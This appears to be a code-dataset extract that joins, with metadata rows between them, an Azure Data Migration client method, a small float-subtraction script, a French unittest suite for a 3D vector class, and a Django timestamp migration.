            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct body
        body_content = self._serialize.body(parameters, 'NameAvailabilityRequest')
        # Construct and send request
        request = self._client.post(url, query_parameters)
        response = self._client.send(
            request, header_parameters, body_content, stream=False, **operation_config)
        if response.status_code not in [200]:
            raise models.ApiErrorException(self._deserialize, response)
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('NameAvailabilityResponse', response)
        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response
        return deserialized
    check_name_availability.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DataMigration/locations/{location}/checkNameAvailability'}
| 45.085399
| 196
| 0.666931
| 5,233
| 49,098
| 6.052551
| 0.054271
| 0.043949
| 0.018186
| 0.027279
| 0.922268
| 0.915954
| 0.910997
| 0.902377
| 0.90222
| 0.900609
| 0
| 0.004508
| 0.24555
| 49,098
| 1,088
| 197
| 45.126838
| 0.850548
| 0.26274
| 0
| 0.837696
| 0
| 0
| 0.141649
| 0.081318
| 0
| 0
| 0
| 0
| 0
| 1
| 0.062827
| false
| 0
| 0.008726
| 0.008726
| 0.164049
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
735334c4be4051091dbd1a72c40c71ccb3032dd7
| 66
|
py
|
Python
|
chapter-02/sample002.py
|
krastin/pp-cs3.0
|
502be9aac2d84215db176864e443c219e5e26591
|
[
"MIT"
] | null | null | null |
chapter-02/sample002.py
|
krastin/pp-cs3.0
|
502be9aac2d84215db176864e443c219e5e26591
|
[
"MIT"
] | null | null | null |
chapter-02/sample002.py
|
krastin/pp-cs3.0
|
502be9aac2d84215db176864e443c219e5e26591
|
[
"MIT"
] | null | null | null |
# Mixed int/float subtraction: a single float operand promotes the result
# to float, so every expression below prints 7.0.
for difference in (17.0 - 10, 17 - 10.0, 17 - 10., 17. - 10):
    print(difference)
| 13.2
| 16
| 0.575758
| 14
| 66
| 2.714286
| 0.285714
| 0.736842
| 0.710526
| 0.578947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 0.181818
| 66
| 4
| 17
| 16.5
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
73596bd9cf9690929121bc78dfaee289859c395c
| 25,158
|
py
|
Python
|
Code/API/funibot_tests/test_vecteur.py
|
philippewarren/neorobrooke-s4
|
9e9374334f8b5aa0de27b3afbd0858ddea935369
|
[
"BSD-3-Clause"
] | null | null | null |
Code/API/funibot_tests/test_vecteur.py
|
philippewarren/neorobrooke-s4
|
9e9374334f8b5aa0de27b3afbd0858ddea935369
|
[
"BSD-3-Clause"
] | 117
|
2021-01-20T21:16:07.000Z
|
2021-04-16T22:16:00.000Z
|
Code/API/funibot_tests/test_vecteur.py
|
philippewarren/neorobrooke-s4
|
9e9374334f8b5aa0de27b3afbd0858ddea935369
|
[
"BSD-3-Clause"
] | 1
|
2022-01-06T20:47:27.000Z
|
2022-01-06T20:47:27.000Z
|
from __future__ import annotations
import unittest
from funibot_api.funilib import Vecteur, ErreurChangerNormeVecteurNul
class TestVecteur(unittest.TestCase):
    """Unit tests for the Vecteur class.

    Covers the arithmetic operators (+, -, *, /, // and their in-place
    variants), the unit vector, norm reading/assignment, inequality and
    tuple conversion, including the error cases (scalar operands where a
    vector is required, vectors containing a None component, division by
    zero, changing the norm of the null vector).
    """

    def test_repr(self):
        """A vector represents itself as "(x;y;z)"."""
        vecteur_test = Vecteur(3, -2, 7)
        self.assertTrue(repr(vecteur_test) == "(3;-2;7)",
                        msg=f"__repr__() donne: {vecteur_test.__repr__()}")

    def test_add(self):
        """Adding two vectors adds them component-wise."""
        self.assertTrue(Vecteur(2, 7, -4) + Vecteur(-7, 2, 10) == Vecteur(-5, 9, 6),
                        msg=f"Vecteur(2,7,-4) + Vecteur(-7,2,10) donne: {Vecteur(2,7,-4) + Vecteur(-7,2,10)}")

    def test_add_nul(self):
        """Adding the null vector to a valued vector is the identity."""
        self.assertTrue(Vecteur() + Vecteur(2, 5, 8.5) == Vecteur(2, 5, 8.5),
                        msg=f"Vecteur() + Vecteur(2,5,8.5) donne: {Vecteur() + Vecteur(2,5,8.5)}")

    def test_add_entier(self):
        """Adding an integer scalar to a vector raises TypeError."""
        vecteur_base = Vecteur(5, -2, 13)
        scalaire_entier = 8
        with self.assertRaises(TypeError, msg=f"L'addition avec autre chose qu'un vecteur (comme un scalaire) n'a pas levé d'exception de type TypeError"):
            vecteur_base + scalaire_entier

    def test_add_none(self):
        """Adding a vector containing a None component raises TypeError."""
        vecteur_base = Vecteur(5, -2, 13)
        vecteur_none = Vecteur(1, 5, None)
        with self.assertRaises(TypeError, msg=f"L'addition de deux vecteurs avec un vecteur ayant un None n'a pas levé d'exception de type TypeError"):
            vecteur_base + vecteur_none

    def test_iadd(self):
        """+= of two vectors adds them component-wise."""
        v = Vecteur(2, 7, -4)
        v += Vecteur(-7, 2, 10)
        self.assertTrue(v == Vecteur(-5, 9, 6),
                        msg=f"Vecteur(2,7,-4) += Vecteur(-7,2,10) donne: {v}")

    def test_iadd_nul(self):
        """+= of a valued vector onto the null vector yields the valued vector."""
        v = Vecteur()
        v += Vecteur(2, 5, 8.5)
        self.assertTrue(v == Vecteur(2, 5, 8.5),
                        msg=f"Vecteur() += Vecteur(2,5,8.5) donne: {v}")

    def test_iadd_entier(self):
        """+= with an integer scalar raises TypeError."""
        v = Vecteur(5, -2, 13)
        with self.assertRaises(TypeError, msg=f"L'addition += avec autre chose qu'un vecteur (comme un scalaire) n'a pas levé d'exception de type TypeError"):
            v += 8

    def test_iadd_none(self):
        """+= with a None component raises TypeError and leaves the target unchanged."""
        vecteur_base = Vecteur(5, -2, 13)
        with self.assertRaises(TypeError, msg=f"L'addition += de deux vecteurs avec un vecteur ayant un None n'a pas levé d'exception de type TypeError"):
            vecteur_base += Vecteur(1, 5, None)
        self.assertTrue(Vecteur(5, -2, 13) == vecteur_base,
                        msg=f"Après l'erreur d'addition +=, le vecteur {Vecteur(5,-2,13)} n'égale pas {vecteur_base}")

    def test_sub(self):
        """Subtracting two vectors subtracts them component-wise."""
        self.assertTrue(Vecteur(2, 7, -4) - Vecteur(-7, 2, 10) == Vecteur(9, 5, -14),
                        msg=f"Vecteur(2,7,-4) - Vecteur(-7,2,10) donne: {Vecteur(2,7,-4) - Vecteur(-7,2,10)}")

    def test_sub_nul(self):
        """Subtracting the null vector is the identity."""
        self.assertTrue(Vecteur(2, 5, 8.5) - Vecteur() == Vecteur(2, 5, 8.5),
                        msg=f"Vecteur(2,5,8.5) - Vecteur() donne: {Vecteur(2,5,8.5) - Vecteur()}")

    def test_sub_entier(self):
        """Subtracting an integer scalar from a vector raises TypeError."""
        vecteur_base = Vecteur(5, -2, 13)
        scalaire_entier = 8
        with self.assertRaises(TypeError, msg=f"La soustraction avec autre chose qu'un vecteur (comme un scalaire) n'a pas levé d'exception de type TypeError"):
            vecteur_base - scalaire_entier

    def test_sub_none(self):
        """Subtracting a vector containing a None component raises TypeError."""
        vecteur_base = Vecteur(5, -2, 13)
        vecteur_none = Vecteur(1, 5, None)
        with self.assertRaises(TypeError, msg=f"La soustraction de deux vecteurs avec un vecteur ayant un None n'a pas levé d'exception de type TypeError"):
            vecteur_base - vecteur_none

    def test_isub(self):
        """-= of two vectors subtracts them component-wise."""
        v = Vecteur(2, 7, -4)
        v -= Vecteur(-7, 2, 10)
        self.assertTrue(v == Vecteur(9, 5, -14),
                        msg=f"Vecteur(2,7,-4) -= Vecteur(-7,2,10) donne: {v}")

    def test_isub_nul(self):
        """-= of a valued vector from the null vector negates it."""
        v = Vecteur()
        v -= Vecteur(2, 5, 8.5)
        self.assertTrue(v == Vecteur(-2, -5, -8.5),
                        msg=f"Vecteur() -= Vecteur(2,5,8.5) donne: {v}")

    def test_isub_entier(self):
        """-= with an integer scalar raises TypeError."""
        v = Vecteur(5, -2, 13)
        with self.assertRaises(TypeError, msg=f"La soustraction -= avec autre chose qu'un vecteur (comme un scalaire) n'a pas levé d'exception de type TypeError"):
            v -= 8

    def test_isub_none(self):
        """-= with a None component raises TypeError and leaves the target unchanged."""
        vecteur_base = Vecteur(5, -2, 13)
        with self.assertRaises(TypeError, msg=f"La soustraction -= de deux vecteurs avec un vecteur ayant un None n'a pas levé d'exception de type TypeError"):
            vecteur_base -= Vecteur(1, 5, None)
        self.assertTrue(Vecteur(5, -2, 13) == vecteur_base,
                        msg=f"Après l'erreur de soustraction -=, le vecteur {Vecteur(5,-2,13)} n'égale pas {vecteur_base}")

    def test_mul_vecteur(self):
        """Multiplying two vectors (vector * vector) raises TypeError."""
        with self.assertRaises(TypeError, msg=f"La multiplication de deux vecteurs n'a pas levé d'exception de type TypeError"):
            Vecteur(2, 7, -4) * Vecteur(-7, 2, 10)

    def test_mul_zero(self):
        """vector * 0 yields the null vector."""
        self.assertTrue(Vecteur(2, 5, 8.5) * 0 == Vecteur(),
                        msg=f"Vecteur(2,5,8.5) * 0 donne: {Vecteur(2,5,8.5) * 0}")

    def test_mul_entier(self):
        """vector * integer scales each component."""
        vecteur_base = Vecteur(5, -2, 13)
        scalaire_entier = 8
        self.assertTrue(vecteur_base * scalaire_entier == Vecteur(40, -16, 104),
                        msg=f"Vecteur(5,-2,13) * 8 donne: {vecteur_base * scalaire_entier}")

    def test_mul_reel(self):
        """vector * float scales each component."""
        vecteur_base = Vecteur(5, -2, 13)
        scalaire_reel = 8.45
        self.assertTrue(vecteur_base * scalaire_reel == Vecteur(42.25, -16.9, 109.85),
                        msg=f"Vecteur(5,-2,13) * 8.45 donne: {vecteur_base * scalaire_reel}")

    def test_mul_entier_negatif(self):
        """vector * negative integer scales and flips signs."""
        vecteur_base = Vecteur(5, -2, 13)
        scalaire_entier_negatif = -8
        self.assertTrue(vecteur_base * scalaire_entier_negatif == Vecteur(-40, 16, -104),
                        msg=f"Vecteur(5,-2,13) * -8 donne: {vecteur_base * scalaire_entier_negatif}")

    def test_mul_none(self):
        """vector-with-None * scalar raises TypeError."""
        vecteur_none = Vecteur(5, -2, None)
        scalaire = 4
        with self.assertRaises(TypeError, msg=f"La multiplicaiton d'un vecteur ayant un None et un scalaire n'a pas levé d'exception de type TypeError"):
            vecteur_none * scalaire

    def test_rmul_zero(self):
        """0 * vector yields the null vector (reflected operand order)."""
        self.assertTrue(0 * Vecteur(2, 5, 8.5) == Vecteur(),
                        msg=f"0 * Vecteur(2,5,8.5) donne: {0 * Vecteur(2,5,8.5)}")

    def test_rmul_entier(self):
        """integer * vector scales each component (reflected operand order)."""
        vecteur_base = Vecteur(5, -2, 13)
        scalaire_entier = 8
        self.assertTrue(scalaire_entier * vecteur_base == Vecteur(40, -16, 104),
                        msg=f"8 * Vecteur(5,-2,13) donne: {scalaire_entier * vecteur_base}")

    def test_rmul_reel(self):
        """float * vector scales each component (reflected operand order)."""
        vecteur_base = Vecteur(5, -2, 13)
        scalaire_reel = 8.45
        self.assertTrue(scalaire_reel * vecteur_base == Vecteur(42.25, -16.9, 109.85),
                        msg=f"8.45 * Vecteur(5,-2,13) donne: {scalaire_reel * vecteur_base}")

    def test_rmul_entier_negatif(self):
        """negative integer * vector scales and flips signs (reflected order)."""
        vecteur_base = Vecteur(5, -2, 13)
        scalaire_entier_negatif = -8
        self.assertTrue(scalaire_entier_negatif * vecteur_base == Vecteur(-40, 16, -104),
                        msg=f"-8 * Vecteur(5,-2,13) donne: {scalaire_entier_negatif * vecteur_base}")

    def test_rmul_none(self):
        """scalar * vector-with-None raises TypeError (reflected order)."""
        vecteur_none = Vecteur(5, -2, None)
        scalaire = 4
        with self.assertRaises(TypeError, msg=f"La multiplicaiton d'un scalaire avec un vecteur ayant un None n'a pas levé d'exception de type TypeError"):
            scalaire * vecteur_none

    def test_imul_vecteur(self):
        """*= between two vectors raises TypeError."""
        v = Vecteur(2, 7, -4)
        with self.assertRaises(TypeError, msg=f"La multiplication *= de deux vecteurs n'a pas levé d'exception de type TypeError"):
            v *= Vecteur(-7, 2, 10)

    def test_imul_zero(self):
        """*= 0 yields the null vector."""
        v = Vecteur(2, 5, 8.5)
        v *= 0
        self.assertTrue(
            v == Vecteur(), msg=f"Vecteur(2,5,8.5) *= 0 donne: {v}")

    def test_imul_entier(self):
        """*= with an integer scales each component."""
        v = Vecteur(5, -2, 13)
        v *= 8
        self.assertTrue(v == Vecteur(40, -16, 104),
                        msg=f"Vecteur(5,-2,13) *= 8 donne: {v}")

    def test_imul_reel(self):
        """*= with a float scales each component."""
        v = Vecteur(5, -2, 13)
        v *= 8.45
        self.assertTrue(v == Vecteur(42.25, -16.9, 109.85),
                        msg=f"Vecteur(5,-2,13) *= 8.45 donne: {v}")

    def test_imul_entier_negatif(self):
        """*= with a negative integer scales and flips signs."""
        v = Vecteur(5, -2, 13)
        v *= -8
        self.assertTrue(v == Vecteur(-40, 16, -104),
                        msg=f"Vecteur(5,-2,13) *= -8 donne: {v}")

    def test_imul_none(self):
        """*= on a vector with a None component raises TypeError, target unchanged."""
        vecteur_none = Vecteur(5, -2, None)
        with self.assertRaises(TypeError, msg=f"La multiplicaiton *= d'un vecteur ayant un None et d'un scalaire n'a pas levé d'exception de type TypeError"):
            vecteur_none *= 4
        self.assertTrue(Vecteur(5, -2, None) == vecteur_none,
                        msg=f"Après l'erreur de multiplicaiton *=, le vecteur {Vecteur(5,-2,None)} n'égale pas {vecteur_none}")

    def test_truediv_vecteur(self):
        """vector / vector raises TypeError."""
        with self.assertRaises(TypeError, msg=f"La division d'un vecteur par un autre vecteur n'a pas levé d'exception de type TypeError"):
            Vecteur(2, 7, -4) / Vecteur(-7, 2, 10)

    def test_truediv_division_par_zero(self):
        """vector / 0 raises ZeroDivisionError."""
        with self.assertRaises(ZeroDivisionError, msg=f"La division d'un vecteur par zéro n'a pas levé d'exception de type ZeroDivisionError"):
            Vecteur(2, 7, -4) / 0

    def test_truediv_nul_par_entier(self):
        """null vector / integer stays the null vector."""
        self.assertTrue(Vecteur() / 9 == Vecteur(),
                        msg=f"Vecteur() / 9 donne: {Vecteur() / 9}")

    def test_truediv_entier(self):
        """vector / integer divides each component."""
        vecteur_base = Vecteur(5, -2, 13)
        scalaire_entier = 8
        self.assertTrue(vecteur_base / scalaire_entier == Vecteur(5/8, -1/4, 13/8),
                        msg=f"Vecteur(5,-2,13) / 8 donne: {vecteur_base / scalaire_entier}")

    def test_truediv_reel(self):
        """vector / float divides each component."""
        vecteur_base = Vecteur(5, -2, 13)
        scalaire_reel = 2.5
        self.assertTrue(vecteur_base / scalaire_reel == Vecteur(2, -0.8, 5.2),
                        msg=f"Vecteur(5,-2,13) / 2.5 donne: {vecteur_base / scalaire_reel}")

    def test_truediv_entier_negatif(self):
        """vector / negative integer divides and flips signs."""
        vecteur_base = Vecteur(5, -2, 13)
        scalaire_entier_negatif = -8
        self.assertTrue(vecteur_base / scalaire_entier_negatif == Vecteur(-5/8, 1/4, -13/8),
                        msg=f"Vecteur(5,-2,13) / -8 donne: {vecteur_base / scalaire_entier_negatif}")

    def test_truediv_none(self):
        """vector-with-None / scalar raises TypeError."""
        vecteur_none = Vecteur(5, -2, None)
        scalaire = 4
        with self.assertRaises(TypeError, msg=f"La division d'un vecteur ayant un None par un scalaire n'a pas levé d'exception de type TypeError"):
            vecteur_none / scalaire

    def test_itruediv_vecteur(self):
        """/= between two vectors raises TypeError."""
        v = Vecteur(2, 7, -4)
        with self.assertRaises(TypeError, msg=f"La division /= d'un vecteur par un autre vecteur n'a pas levé d'exception de type TypeError"):
            v /= Vecteur(-7, 2, 10)

    def test_itruediv_division_par_zero(self):
        """/= 0 raises ZeroDivisionError."""
        v = Vecteur(2, 7, -4)
        with self.assertRaises(ZeroDivisionError, msg=f"La division /= d'un vecteur par zéro n'a pas levé d'exception de type ZeroDivisionError"):
            v /= 0

    def test_itruediv_nul_par_entier(self):
        """/= on the null vector stays the null vector."""
        v = Vecteur()
        v /= 9
        self.assertTrue(v == Vecteur(), msg=f"Vecteur() /= 9 donne: {v}")

    def test_itruediv_entier(self):
        """/= with an integer divides each component."""
        v = Vecteur(5, -2, 13)
        v /= 8
        self.assertTrue(v == Vecteur(5/8, -1/4, 13/8),
                        msg=f"Vecteur(5,-2,13) /= 8 donne: {v}")

    def test_itruediv_reel(self):
        """/= with a float divides each component."""
        v = Vecteur(5, -2, 13)
        v /= 2.5
        self.assertTrue(v == Vecteur(2, -0.8, 5.2),
                        msg=f"Vecteur(5,-2,13) /= 2.5 donne: {v}")

    def test_itruediv_entier_negatif(self):
        """/= with a negative integer divides and flips signs."""
        v = Vecteur(5, -2, 13)
        v /= -8
        self.assertTrue(v == Vecteur(-5/8, 1/4, -13/8),
                        msg=f"Vecteur(5,-2,13) /= -8 donne: {v}")

    def test_itruediv_none(self):
        """/= on a vector with a None component raises TypeError, target unchanged."""
        vecteur_none = Vecteur(5, -2, None)
        with self.assertRaises(TypeError, msg=f"La division /= d'un vecteur ayant un None par un scalaire n'a pas levé d'exception de type TypeError"):
            vecteur_none /= 4
        self.assertTrue(Vecteur(5, -2, None) == vecteur_none,
                        msg=f"Après l'erreur de division /=, le vecteur {Vecteur(5,-2,None)} n'égale pas {vecteur_none}")

    def test_floordiv_vecteur(self):
        """vector // vector raises TypeError."""
        with self.assertRaises(TypeError, msg=f"La division // d'un vecteur par un autre vecteur n'a pas levé d'exception de type TypeError"):
            Vecteur(2.3, 7, -4) // Vecteur(-7, 2.1, 10)

    def test_floordiv_division_par_zero(self):
        """vector // 0 raises ZeroDivisionError."""
        with self.assertRaises(ZeroDivisionError, msg=f"La division // d'un vecteur par zéro n'a pas levé d'exception de type ZeroDivisionError"):
            Vecteur(2, 7, -4) // 0

    def test_floordiv_nul_par_entier(self):
        """null vector // integer stays the null vector."""
        self.assertTrue(Vecteur() // 9 == Vecteur(),
                        msg=f"Vecteur() // 9 donne: {Vecteur() // 9}")

    def test_floordiv_entier(self):
        """vector // integer floor-divides each component."""
        vecteur_base = Vecteur(5, -2, 13)
        scalaire_entier = 8
        self.assertTrue(vecteur_base // scalaire_entier == Vecteur(0, -1, 1),
                        msg=f"Vecteur(5,-2,13) // 8 donne: {vecteur_base // scalaire_entier}")

    def test_floordiv_reel(self):
        """vector // float floor-divides each component."""
        vecteur_base = Vecteur(5, -2, 13)
        scalaire_reel = 2.5
        self.assertTrue(vecteur_base // scalaire_reel == Vecteur(2.0, -1.0, 5.0),
                        msg=f"Vecteur(5,-2,13) // 2.5 donne: {vecteur_base // scalaire_reel}")

    def test_floordiv_reel_negatif(self):
        """vector // negative float floors towards negative infinity."""
        vecteur_base = Vecteur(5, -2, 13)
        scalaire_reel_negatif = -1.5
        self.assertTrue(vecteur_base // scalaire_reel_negatif == Vecteur(-4.0, 1.0, -9.0),
                        msg=f"Vecteur(5,-2,13) // -1.5 donne: {vecteur_base // scalaire_reel_negatif}")

    def test_floordiv_none(self):
        """vector-with-None // scalar raises TypeError."""
        vecteur_none = Vecteur(5, -2, None)
        scalaire = 4
        with self.assertRaises(TypeError, msg=f"La division // d'un vecteur ayant un None par un scalaire n'a pas levé d'exception de type TypeError"):
            vecteur_none // scalaire

    def test_ifloordiv_vecteur(self):
        """//= between two vectors raises TypeError."""
        v = Vecteur(2.3, 7, -4)
        with self.assertRaises(TypeError, msg=f"La division //= d'un vecteur par un autre vecteur n'a pas levé d'exception de type TypeError"):
            v //= Vecteur(-7, 2.1, 10)

    def test_ifloordiv_division_par_zero(self):
        """//= 0 raises ZeroDivisionError."""
        v = Vecteur(2, 7, -4)
        with self.assertRaises(ZeroDivisionError, msg=f"La division //= d'un vecteur par zéro n'a pas levé d'exception de type ZeroDivisionError"):
            # Was ``v // 0``, which exercised plain floor division instead of
            # the in-place operator this test is named for.
            v //= 0

    def test_ifloordiv_nul_par_entier(self):
        """//= on the null vector stays the null vector."""
        v = Vecteur()
        v //= 9
        self.assertTrue(v == Vecteur(), msg=f"Vecteur() //= 9 donne: {v}")

    def test_ifloordiv_entier(self):
        """//= with an integer floor-divides each component."""
        v = Vecteur(5, -2, 13)
        v //= 8
        self.assertTrue(v == Vecteur(0, -1, 1),
                        msg=f"Vecteur(5,-2,13) //= 8 donne: {v}")

    def test_ifloordiv_reel(self):
        """//= with a float floor-divides each component."""
        v = Vecteur(5, -2, 13)
        v //= 2.5
        self.assertTrue(v == Vecteur(2.0, -1.0, 5.0),
                        msg=f"Vecteur(5,-2,13) //= 2.5 donne: {v}")

    def test_ifloordiv_reel_negatif(self):
        """//= with a negative float floors towards negative infinity."""
        v = Vecteur(5, -2, 13)
        v //= -1.5
        self.assertTrue(v == Vecteur(-4.0, 1.0, -9.0),
                        msg=f"Vecteur(5,-2,13) //= -1.5 donne: {v}")

    def test_ifloordiv_none(self):
        """//= on a vector with a None component raises TypeError, target unchanged."""
        vecteur_none = Vecteur(5, -2, None)
        # Message corrected: it previously said "/=" for this "//=" test.
        with self.assertRaises(TypeError, msg=f"La division //= d'un vecteur ayant un None par un scalaire n'a pas levé d'exception de type TypeError"):
            vecteur_none //= 4
        self.assertTrue(Vecteur(5, -2, None) == vecteur_none,
                        msg=f"Après l'erreur de division //=, le vecteur {Vecteur(5,-2,None)} n'égale pas {vecteur_none}")

    def test_unitaire(self):
        """unitaire() returns the normalized (unit-length) vector."""
        self.assertTrue(Vecteur(2, -5, 3).unitaire() == Vecteur(0.3244428422615251, -0.8111071056538127,
                                                                0.48666426339228763), msg=f"Le vecteur unitaire de Vecteur(2,-5,3) donne: {Vecteur(2,-5,3).unitaire()}")

    def test_unitaire_vecteur_nul(self):
        """unitaire() of the null vector is the null vector."""
        self.assertTrue(Vecteur().unitaire() == Vecteur(
        ), msg=f"Le vecteur unitaire du vecteur nul donne: {Vecteur().unitaire()}")

    def test_ne(self):
        """Vectors differing in one component compare unequal."""
        self.assertTrue(Vecteur(1, 2, 3) != Vecteur(
            1, 2, 4), msg=f"Les vecteurs {Vecteur(1,2,3)} et {Vecteur(1,2,4)} sont égaux")

    def test_norme(self):
        """norme returns the Euclidean length (3-4-5 triangle)."""
        self.assertTrue(Vecteur(3, 4, 0).norme == 5,
                        msg=f"La norme du Vecteur(3,4,0) donne: {Vecteur(3,4,0).norme}")

    def test_norme_null(self):
        """The norm of the null vector is 0."""
        self.assertTrue(Vecteur(0, 0, 0).norme == 0,
                        msg=f"La norme du Vecteur(0,0,0) donne: {Vecteur(0,0,0).norme}")

    def test_norme_none(self):
        """Reading the norm of a vector with a None component raises TypeError."""
        with self.assertRaises(TypeError, msg=f"La norme d'un vecteur ayant None n'a pas levé d'exception de type TypeError"):
            Vecteur(3, 4, None).norme == 5

    def test_norme_changement(self):
        """Assigning norme rescales every component proportionally."""
        vecteur_base = Vecteur(3, 4, 0)
        vecteur_base.norme = 2.5
        self.assertTrue(vecteur_base.x == 1.5,
                        msg=f"La composante en x du Vecteur(3,4,0) en imposant sa norme à 2.5 donne: {vecteur_base.x}")
        self.assertTrue(
            vecteur_base.y == 2, msg=f"La composante en y du Vecteur(3,4,0) en imposant sa norme à 2.5 donne: {vecteur_base.y}")
        self.assertTrue(
            vecteur_base.z == 0, msg=f"La composante en z du Vecteur(3,4,0) en imposant sa norme à 2.5 donne: {vecteur_base.z}")

    def test_norme_changement_pour_0(self):
        """Assigning norme = 0 zeroes every component."""
        vecteur_base = Vecteur(3, 4, 0)
        vecteur_base.norme = 0
        self.assertTrue(
            vecteur_base.x == 0, msg=f"La composante en x du Vecteur(3,4,0) en imposant sa norme à 0 donne: {vecteur_base.x}")
        self.assertTrue(
            vecteur_base.y == 0, msg=f"La composante en y du Vecteur(3,4,0) en imposant sa norme à 0 donne: {vecteur_base.y}")
        self.assertTrue(
            vecteur_base.z == 0, msg=f"La composante en z du Vecteur(3,4,0) en imposant sa norme à 0 donne: {vecteur_base.z}")

    def test_norme_changement_vecteur_null(self):
        """Assigning a norm to the null vector raises ErreurChangerNormeVecteurNul."""
        vecteur_null = Vecteur(0, 0, 0)
        # Message corrected: it previously named a nonexistent exception class
        # ("ChangerNormeVecteurNulErreur"); the real one is imported above.
        with self.assertRaises(ErreurChangerNormeVecteurNul, msg=f"La modification de la norme d'un vecteur null n'a pas levé d'exception de type ErreurChangerNormeVecteurNul"):
            vecteur_null.norme = 2.5

    def test_norme_changement_none(self):
        """Assigning norme = None raises TypeError and leaves the vector unchanged."""
        vecteur_base = Vecteur(3, 4, 0)
        # Message corrected: it was copied from a division test.
        with self.assertRaises(TypeError, msg=f"Le changement de norme par None n'a pas levé d'exception de type TypeError"):
            vecteur_base.norme = None
        self.assertTrue(
            vecteur_base.x == 3, msg=f"Après l'erreur du changement de norme, la composante en x du vecteur modifié {vecteur_base.x} n'égale pas la composante en x du vecteur de base 3")
        self.assertTrue(
            vecteur_base.y == 4, msg=f"Après l'erreur du changement de norme, la composante en y du vecteur modifié {vecteur_base.y} n'égale pas la composante en y du vecteur de base 4")
        self.assertTrue(
            vecteur_base.z == 0, msg=f"Après l'erreur du changement de norme, la composante en z du vecteur modifié {vecteur_base.z} n'égale pas la composante en z du vecteur de base 0")

    def test_tuple(self):
        """vers_tuple() returns an (x, y, z) tuple matching the components."""
        v = Vecteur(1, 2, 3)
        v_tuple = v.vers_tuple()
        self.assertTrue(type(v_tuple) == tuple,
                        msg=f"La création d'un tuple à partir du vecteur n'a pas fonctionné")
        self.assertTrue(
            v_tuple[0] == v.x, msg=f"La valeur du Tuple à la position 0, {v_tuple[0]} n'égale pas la composante en x du Vecteur de départ, {v.x}")
        self.assertTrue(
            v_tuple[1] == v.y, msg=f"La valeur du Tuple à la position 1, {v_tuple[1]} n'égale pas la composante en y du Vecteur de départ, {v.y}")
        self.assertTrue(
            v_tuple[2] == v.z, msg=f"La valeur du Tuple à la position 2, {v_tuple[2]} n'égale pas la composante en z du Vecteur de départ, {v.z}")
| 50.927126
| 186
| 0.603188
| 3,726
| 25,158
| 3.98014
| 0.039184
| 0.023736
| 0.040661
| 0.040054
| 0.891976
| 0.845651
| 0.81261
| 0.776804
| 0.760148
| 0.743898
| 0
| 0.048554
| 0.264846
| 25,158
| 493
| 187
| 51.030426
| 0.753285
| 0.150052
| 0
| 0.255814
| 0
| 0.145349
| 0.315724
| 0.01147
| 0
| 0
| 0
| 0
| 0.255814
| 1
| 0.212209
| false
| 0
| 0.008721
| 0
| 0.223837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b41eac0fb545335c3317ecb5b09eb1d3edadd722
| 2,250
|
py
|
Python
|
apps/greencheck/migrations/0003_timestamped_ranges_approvals.py
|
eharris128/admin-portal
|
cb9e2ec1c8c47092a2297ca58bef41e37e2b7f51
|
[
"Apache-2.0"
] | null | null | null |
apps/greencheck/migrations/0003_timestamped_ranges_approvals.py
|
eharris128/admin-portal
|
cb9e2ec1c8c47092a2297ca58bef41e37e2b7f51
|
[
"Apache-2.0"
] | null | null | null |
apps/greencheck/migrations/0003_timestamped_ranges_approvals.py
|
eharris128/admin-portal
|
cb9e2ec1c8c47092a2297ca58bef41e37e2b7f51
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 2.2.7 on 2019-11-20 14:14
from django.db import migrations
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
    """Add audit timestamps (created/modified) to the greencheck models."""

    dependencies = [
        ('greencheck', '0002_approval_original_id_nullable'),
    ]

    # Each of these models receives the same pair of timestamp columns.
    _TIMESTAMPED_MODELS = (
        'greencheckasn',
        'greencheckasnapprove',
        'greencheckip',
        'greencheckipapprove',
    )

    operations = [
        op
        for model in _TIMESTAMPED_MODELS
        for op in (
            migrations.AddField(
                model_name=model,
                name='created',
                field=model_utils.fields.AutoCreatedField(
                    default=django.utils.timezone.now,
                    editable=False,
                    verbose_name='created',
                ),
            ),
            migrations.AddField(
                model_name=model,
                name='modified',
                field=model_utils.fields.AutoLastModifiedField(
                    default=django.utils.timezone.now,
                    editable=False,
                    verbose_name='modified',
                ),
            ),
        )
    ]
| 40.178571
| 135
| 0.652889
| 213
| 2,250
| 6.760563
| 0.206573
| 0.06875
| 0.11875
| 0.15
| 0.858333
| 0.858333
| 0.750694
| 0.750694
| 0.750694
| 0.750694
| 0
| 0.01104
| 0.235111
| 2,250
| 55
| 136
| 40.909091
| 0.825683
| 0.02
| 0
| 0.816327
| 1
| 0
| 0.132547
| 0.015434
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.061224
| 0
| 0.122449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
